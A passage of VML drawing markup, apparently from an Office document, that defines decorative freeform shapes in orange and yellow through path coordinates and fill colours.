                    <v:shape id="Freeform 213" o:spid="_x0000_s1237"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214" o:spid="_x0000_s1238"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" path="m31,13l26,26r-5,l16,26,5,22,,17,,9,11,,26,4r5,9xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,13;26,26;21,26;16,26;5,22;0,17;0,9;11,0;26,4;31,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 215" o:spid="_x0000_s1239"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" path="m36,13r-5,9l21,22r-10,l,13,21,,31,5r5,8xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,13;31,22;21,22;11,22;0,13;21,0;31,5;36,13" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 216" o:spid="_x0000_s1240"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" path="m46,13l31,22,20,26r-5,l5,18,,9,15,r5,l36,5r10,8xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="46,13;31,22;20,26;15,26;5,18;0,9;15,0;20,0;36,5;46,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 217" o:spid="_x0000_s1241"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" path="m21,4l16,8r,5l6,8,,4,6,,16,r5,4xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="21,4;16,8;16,13;6,8;0,4;6,0;16,0;21,4" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 218" o:spid="_x0000_s1242"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" path="m26,4l20,9,5,9,,,15,,26,4xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,4;20,9;5,9;0,0;15,0;26,4" o:connectangles="0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 219" o:spid="_x0000_s1243"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" path="m31,9l15,18,5,18,,18,15,,26,r5,l31,9xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,9;15,18;5,18;0,18;15,0;26,0;31,0;31,9" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 220" o:spid="_x0000_s1244"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221" o:spid="_x0000_s1245"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222" o:spid="_x0000_s1246"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" path="m10,9r5,1268l15,1316r-5,18l,1351r,-78l,4,10,r,4l10,9xe" fillcolor="#ff7f00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,9;15,1277;15,1316;10,1334;0,1351;0,1273;0,4;10,0;10,4;10,9" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 223" o:spid="_x0000_s1247"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224" o:spid="_x0000_s1248"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225" o:spid="_x0000_s1249"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" path="m135,13r,9l129,31,109,48,62,83,21,113,11,109,,104,21,78,52,52,109,5,119,r5,l135,13xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="135,13;135,22;129,31;109,48;62,83;21,113;11,109;0,104;21,78;52,52;109,5;119,0;124,0;135,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 226" o:spid="_x0000_s1250"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227" o:spid="_x0000_s1251"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" path="m57,4l6,48,,48,26,22,42,9,57,r,4xe" fillcolor="#ff7f00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,4;6,48;0,48;26,22;42,9;57,0;57,4" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 228" o:spid="_x0000_s1252"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229" o:spid="_x0000_s1253"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" path="m26,39r-16,l,26,,,26,18r5,8l31,35r-5,4xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,39;10,39;0,26;0,0;26,18;31,26;31,35;26,39" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 230" o:spid="_x0000_s1254"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231" o:spid="_x0000_s1255"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232" o:spid="_x0000_s1256"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" path="m5,r,l,4,,,5,xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="5,0;5,0;0,4;0,4;0,0;5,0" o:connectangles="0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 233" o:spid="_x0000_s1257"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" path="m94,13l62,17,21,51,11,47,,38,11,21,21,4,42,,52,,83,,94,13xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="94,13;62,17;21,51;11,47;0,38;11,21;21,4;42,0;52,0;83,0;94,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 234" o:spid="_x0000_s1258"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" path="m16,34r-6,l,30,,21,5,8,16,r,34xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,34;10,34;0,30;0,21;5,8;16,0;16,34" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 235" o:spid="_x0000_s1259"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236" o:spid="_x0000_s1260"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" path="m,l,4,,xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,0;0,4;0,0" o:connectangles="0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 237" o:spid="_x0000_s1261"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238" o:spid="_x0000_s1262"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" path="m26,8r,9l21,17,,17,,8,5,,15,,26,8xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,8;26,17;21,17;0,17;0,8;5,0;15,0;26,8" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 239" o:spid="_x0000_s1263"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240" o:spid="_x0000_s1264"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241" o:spid="_x0000_s1265"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" path="m37,17r,13l26,30r-5,l16,30,,,16,8r21,9xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="37,17;37,30;26,30;21,30;16,30;0,0;16,8;37,17" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 242" o:spid="_x0000_s1266"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243" o:spid="_x0000_s1267"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" path="m68,21r5,18l83,60r-15,l52,56,31,43,,,31,13r37,8xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="68,21;73,39;83,60;68,60;52,56;31,43;0,0;0,0;31,13;68,21" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 244" o:spid="_x0000_s1268"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" path="m47,22l36,26r-15,l,4,16,,31,,47,22xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="47,22;36,26;21,26;0,4;16,0;31,0;47,22" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 245" o:spid="_x0000_s1269"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" path="m26,8r,13l11,26r-5,l,17,6,8,11,,21,4r5,4xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,8;26,21;11,26;6,26;0,17;6,8;11,0;21,4;26,8" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 246" o:spid="_x0000_s1270"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" path="m109,48l93,44,78,39,52,22,36,39,26,48,10,52,,52,15,35,26,18,41,,52,,67,,93,22r16,26xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="109,48;93,44;78,39;52,22;36,39;26,48;10,52;0,52;15,35;26,18;41,0;52,0;67,0;93,22;109,48" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 247" o:spid="_x0000_s1271"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" path="m31,13l26,26,16,35,5,26,,17,,13,5,4,16,,26,4r5,5l31,13xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,13;26,26;16,35;5,26;0,17;0,13;5,4;16,0;26,4;31,9;31,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 248" o:spid="_x0000_s1272"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" path="m20,l15,21r-5,5l,26,,21,,13,10,,20,xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,0;15,21;10,26;0,26;0,21;0,13;10,0;20,0" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 249" o:spid="_x0000_s1273"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" path="m26,26l16,22,11,17,,,6,,21,13r5,9l26,26xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,26;16,22;11,17;0,0;6,0;21,13;26,22;26,26" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 250" o:spid="_x0000_s1274"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" path="m20,8r-5,9l5,21,,13,,4,5,,15,4r5,4xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,8;15,17;5,21;0,13;0,4;5,0;15,4;20,8" o:connectangles="0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 251" o:spid="_x0000_s1275"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" path="m20,9r-5,4l10,17,,13,5,,15,r5,9xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="20,9;15,13;10,17;0,13;5,0;15,0;20,9" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 252" o:spid="_x0000_s1276"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253" o:spid="_x0000_s1277"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" path="m62,31r5,17l67,65,52,70,41,78r,5l41,96r-10,4l26,100r,-9l26,78,,65,15,31,31,,41,5r11,8l62,31xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="62,31;67,48;67,65;52,70;41,78;41,83;41,96;31,100;26,100;26,91;26,78;0,65;15,31;31,0;41,5;52,13;62,31" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 254" o:spid="_x0000_s1278"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" path="m37,13r,13l26,34,11,30,,21,,13,,8,16,,31,4r6,9xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="37,13;37,26;26,34;11,30;0,21;0,13;0,8;16,0;31,4;37,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 255" o:spid="_x0000_s1279"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" path="m26,9r-6,8l15,22,5,22,,13,,4,5,,20,r6,9xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="26,9;20,17;15,22;5,22;0,13;0,4;5,0;20,0;26,9" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 256" o:spid="_x0000_s1280"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257" o:spid="_x0000_s1281"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258" o:spid="_x0000_s1282"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" path="m57,43l,43,5,34,10,21,26,r5,l36,4,57,21r,13l57,43xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,43;0,43;5,34;10,21;26,0;31,0;31,0;36,4;57,21;57,34;57,43" o:connectangles="0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 259" o:spid="_x0000_s1283"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" path="m98,4r,l47,8,26,8,,4,,,52,,73,,98,4xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="98,4;98,4;47,8;26,8;0,4;0,0;52,0;73,0;98,4" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 260" o:spid="_x0000_s1284"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" path="m161,13r-6,8l145,30,11,30,,21,,8,11,,140,r10,l161,13xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="161,13;155,21;145,30;11,30;0,21;0,8;11,0;140,0;150,0;161,13" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 261" o:spid="_x0000_s1285"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" path="m99,8l47,8,,8,,4,47,,99,4r,4xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="99,8;47,8;0,8;0,4;47,0;99,4;99,8" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 262" o:spid="_x0000_s1286"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" path="m42,l57,35,68,48r,4l62,52,31,39,,30,,26,11,22,21,9,26,r5,l42,xe" fillcolor="black" strokeweight=".25pt">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="42,0;57,35;68,48;68,52;62,52;31,39;0,30;0,26;11,22;21,9;26,0;31,0;42,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                  </v:group>
                  <v:group id="Group 263" o:spid="_x0000_s1287" style="position:absolute;left:9482;top:14211;width:1588;height:1746;rotation:180" coordorigin="7385,2754" coordsize="2631,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">
                    <v:rect id="AutoShape 264" o:spid="_x0000_s1288" style="position:absolute;left:7385;top:2754;width:2631;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o:lock v:ext="edit" aspectratio="t"/>
                    </v:rect>
                    <v:shape id="Freeform 265" o:spid="_x0000_s1289" style="position:absolute;left:7628;top:2797;width:165;height:39;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m165,31r-10,8l140,31,108,22,72,18r-31,l10,22,,22,21,9,46,5,67,,93,5r36,13l165,31xe" fillcolor="#ff9e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="165,31;155,39;155,39;140,31;108,22;72,18;41,18;10,22;0,22;21,9;46,5;67,0;93,5;129,18;165,31" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 266" o:spid="_x0000_s1290" style="position:absolute;left:7432;top:2815;width:268;height:220;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m242,73r16,18l263,108r5,43l268,156r-5,-5l253,121,237,86,217,56,196,43,180,34,149,21,118,17,51,8,25,13r-10,l10,21r,26l10,73r5,22l25,121r16,22l62,164r20,17l108,194r21,9l149,207r21,l191,216r-11,4l144,220r-31,-8l82,199,56,181,36,160,20,143,10,121,5,95,,52,5,4,36,,72,r36,l139,4r31,9l196,30r31,17l242,73xe" fillcolor="#ff7f00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="242,73;258,91;263,108;268,151;268,156;263,151;253,121;237,86;217,56;196,43;180,34;149,21;118,17;51,8;25,13;15,13;10,21;10,47;10,73;15,95;25,121;41,143;62,164;82,181;108,194;129,203;149,207;170,207;191,216;180,220;144,220;113,212;82,199;56,181;36,160;20,143;10,121;5,95;0,52;5,4;36,0;72,0;108,0;139,4;170,13;196,30;227,47;242,73" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 267" o:spid="_x0000_s1291" style="position:absolute;left:9551;top:2810;width:284;height:191;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="28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" path="m207,26r20,5l248,35r21,9l279,61,253,74,238,87r-6,9l238,113r15,13l284,143r-10,13l258,161r-26,12l207,178r-37,-5l108,169r-26,l51,178,15,191r-5,-9l15,178r16,-5l36,173r10,-4l36,156r,-4l36,148r15,4l62,161r15,4l82,165r11,-4l72,143,57,139r,-13l67,126r10,l98,139r21,17l129,156r16,l134,148r-5,-9l108,126r-5,-9l160,148r31,8l227,161r5,l238,156r-6,-8l222,148r-10,l196,143,165,130,134,109r11,-5l155,104r10,5l176,117r15,9l212,117r10,-13l217,91,212,78,196,74r-15,l160,87r-10,4l134,91,150,74,170,61,227,48r5,-4l232,39r-20,l191,39r-31,9l129,70,98,91,88,87,93,74r15,-9l124,61,134,48r-5,-4l119,39,88,57,62,78,51,83,46,78r,-13l57,61,77,48,72,39,51,48,31,57,20,48,41,31,31,26r-11,l10,22,,13,,5,5,,26,18r20,8l72,35r31,4l155,35r52,-9xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="227,31;269,44;253,74;232,96;253,126;274,156;232,173;170,173;82,169;15,191;15,178;36,173;36,156;36,148;62,161;82,165;72,143;57,126;77,126;119,156;145,156;129,139;103,117;191,156;232,161;232,148;212,148;165,130;145,104;165,109;191,126;222,104;212,78;181,74;150,91;150,74;227,48;232,39;191,39;129,70;88,87;108,65;134,48;119,39;62,78;46,78;57,61;72,39;31,57;41,31;20,26;0,13;5,0;46,26;103,39;207,26" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 268" o:spid="_x0000_s1292" style="position:absolute;left:9504;top:2823;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" path="m36,13r-5,9l21,26,11,22,,13,5,5,16,,26,5r10,8xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="36,13;31,22;21,26;11,22;0,13;5,5;16,0;26,5;36,13" o:connectangles="0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 269" o:spid="_x0000_s1293" style="position:absolute;left:7804;top:2845;width:1695;height:17;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="16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" path="m1674,r21,13l1685,13r-5,l1669,13r-26,l1612,13r-36,l1530,13r-52,l1421,13r-62,l1292,13r-140,l997,13r-155,l687,13r-155,l387,13r-62,l263,13r-57,l155,13r-47,l72,13r-31,l15,17,,17,,4,5,,1674,xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1674,0;1695,13;1685,13;1680,13;1669,13;1643,13;1612,13;1576,13;1530,13;1478,13;1421,13;1359,13;1292,13;1152,13;997,13;842,13;687,13;532,13;387,13;325,13;263,13;206,13;155,13;108,13;72,13;41,13;15,17;0,17;0,17;0,4;5,0;1674,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 270" o:spid="_x0000_s1294" style="position:absolute;left:7468;top:2845;width:201;height:156;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="2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" path="m41,22r5,l41,13r,-9l46,22,62,39,72,35r,-9l82,43r6,5l98,52r5,-4l119,61r5,l129,56r,-4l134,61r,13l144,82r11,l160,91r10,4l175,91r6,-4l170,69r,-8l170,56r16,9l191,82r10,35l196,121r-31,-8l150,108r-16,l139,156,98,151,67,138r15,-4l93,134r15,l108,130r,-9l103,117r-57,4l46,113r11,-5l72,113r10,l88,104r,-4l82,100,77,95r5,-4l72,82,51,78,26,74r-16,l10,69r16,l41,74r10,l62,74r5,-9l51,61,36,56,5,52r5,l20,52r16,4l46,52r5,-4l46,43,41,39r-21,l10,35,5,30r,-4l15,22,5,13,,4,10,r5,4l26,17r5,5l41,22xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="46,22;41,4;62,39;72,26;88,48;103,48;124,61;129,52;134,74;144,82;160,91;175,91;170,69;170,56;191,82;196,121;150,108;139,156;67,138;93,134;108,130;103,117;46,113;57,108;82,113;88,100;77,95;72,82;26,74;10,69;41,74;62,74;51,61;5,52;20,52;46,52;46,43;20,39;5,30;15,22;0,4;10,0;26,17;41,22" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 271" o:spid="_x0000_s1295" style="position:absolute;left:7664;top:2845;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" path="m31,39l,,21,17,31,39xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,39;0,0;21,17;31,39" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 272" o:spid="_x0000_s1296" style="position:absolute;left:7695;top:2849;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" path="m16,13l5,9,,,16,13xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,13;5,9;0,0;16,13" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 273" o:spid="_x0000_s1297" style="position:absolute;left:9913;top:2841;width:41;height:134;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m31,8l41,125r-5,5l31,134,15,130r-5,l,125,,65,,4,10,,20,,31,4r,4xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="31,8;41,125;36,130;31,134;15,130;10,130;0,125;0,65;0,4;10,0;20,0;31,4;31,8" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 274" o:spid="_x0000_s1298" style="position:absolute;left:7716;top:2849;width:57;height:134;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5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" path="m57,5l52,22,46,39r6,35l52,109r-6,13l31,134r-11,l15,130,5,117,5,96,5,78,,61r5,9l10,70r10,l20,57,15,44,,22,15,39r5,13l31,57r,-5l31,44r,-13l36,35r5,-4l41,13r,-4l41,,52,r5,5xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,5;52,22;46,39;52,74;52,109;46,122;31,134;20,134;15,130;5,117;5,96;5,78;0,61;5,70;10,70;20,70;20,57;15,44;0,22;15,39;20,52;31,57;31,52;31,44;31,31;36,35;41,31;41,13;41,9;41,0;52,0;57,5" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 275" o:spid="_x0000_s1299" style="position:absolute;left:7731;top:2849;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" path="m11,13l,,11,13xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,13;0,0;11,13" o:connectangles="0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 276" o:spid="_x0000_s1300" style="position:absolute;left:7530;top:2854;width:10;height:17;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m10,17l5,13,,,10,17xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="10,17;5,13;0,0;10,17" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 277" o:spid="_x0000_s1301" style="position:absolute;left:7561;top:2858;width:1;height:13;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m,13l,9,,,,13xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="0,13;0,9;0,0;0,13" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 278" o:spid="_x0000_s1302" style="position:absolute;left:9876;top:2858;width:16;height:91;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m16,4r,87l6,74,,48,,4,11,r5,4xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="16,4;16,91;6,74;0,48;0,4;11,0;16,4" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 279" o:spid="_x0000_s1303" style="position:absolute;left:9969;top:2862;width:11;height:87;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m11,83l6,87,,83,,5,6,r5,5l11,83xe" fillcolor="#ff4000" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,83;6,87;0,83;0,5;6,0;11,5;11,83" o:connectangles="0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 280" o:spid="_x0000_s1304" style="position:absolute;left:9453;top:2867;width:103;height:82;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="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" path="m103,4l20,43,36,60r15,9l87,82r16,l77,78,51,69,25,60,,43,25,30,46,17,98,r5,4xe" fillcolor="#ffbf00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="103,4;20,43;36,60;51,69;87,82;103,82;77,78;51,69;25,60;0,43;25,30;46,17;98,0;103,4" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 281" o:spid="_x0000_s1305" style="position:absolute;left:7612;top:2880;width:6;height:17;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" path="m6,17l,8,,,6,8r,9xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6,17;0,8;0,0;6,8;6,17" o:connectangles="0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 282" o:spid="_x0000_s1306" style="position:absolute;left:7788;top:2875;width:1665;height:18;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m1639,r26,9l1654,13r-36,l1577,13r-47,l1479,13r-52,l1365,13r-124,5l1112,18r-140,l693,13r-135,l429,13r-114,l264,13r-47,l171,13r-42,l93,13r-31,l42,13r-21,l11,13r-6,l,9,5,5r6,l21,5r21,l73,5,114,r41,l202,r57,l321,r62,l522,,667,,822,,972,r150,l1256,r67,l1380,r57,l1489,r41,l1566,r31,l1618,r16,l1639,xe" fillcolor="#ff7f00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1639,0;1665,9;1654,13;1618,13;1577,13;1530,13;1479,13;1427,13;1365,13;1241,18;1112,18;972,18;693,13;558,13;429,13;315,13;264,13;217,13;171,13;129,13;93,13;62,13;42,13;21,13;11,13;5,13;0,9;5,5;11,5;21,5;42,5;73,5;114,0;155,0;202,0;259,0;321,0;383,0;522,0;667,0;822,0;972,0;1122,0;1256,0;1323,0;1380,0;1437,0;1489,0;1530,0;1566,0;1597,0;1618,0;1634,0;1639,0" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 283" o:spid="_x0000_s1307" style="position:absolute;left:7700;top:28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" path="m11,13l,,11,9r,4xe" fillcolor="#ffde00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="11,13;0,0;11,9;11,13" o:connectangles="0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 284" o:spid="_x0000_s1308" style="position:absolute;left:9804;top:2884;width:57;height:52;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5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" path="m57,52r-21,l21,43,10,35,,26,,22,10,13,26,4,57,r,52xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="57,52;36,52;21,43;10,35;0,26;0,22;10,13;26,4;57,0;57,52" o:connectangles="0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 285" o:spid="_x0000_s1309" style="position:absolute;left:9504;top:2888;width:124;height:48;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1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" path="m83,13r10,5l104,22r10,l124,26r-20,5l88,39,73,48,36,39,,22,16,18,36,9,73,,83,13xe" fillcolor="#ff5e00" stroked="f">
                      <v:path arrowok="t" o:connecttype="custom" o:connectlocs="83,13;93,18;104,22;114,22;124,26;104,31;88,39;73,48;36,39;0,22;16,18;36,9;73,0;83,13" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                    </v:shape>
                    <v:shape id="Freeform 286" o:spid="_x0000_s1310" style="position:absolute;left:7566;top:2906;width:1215;height:1026;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1215,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" 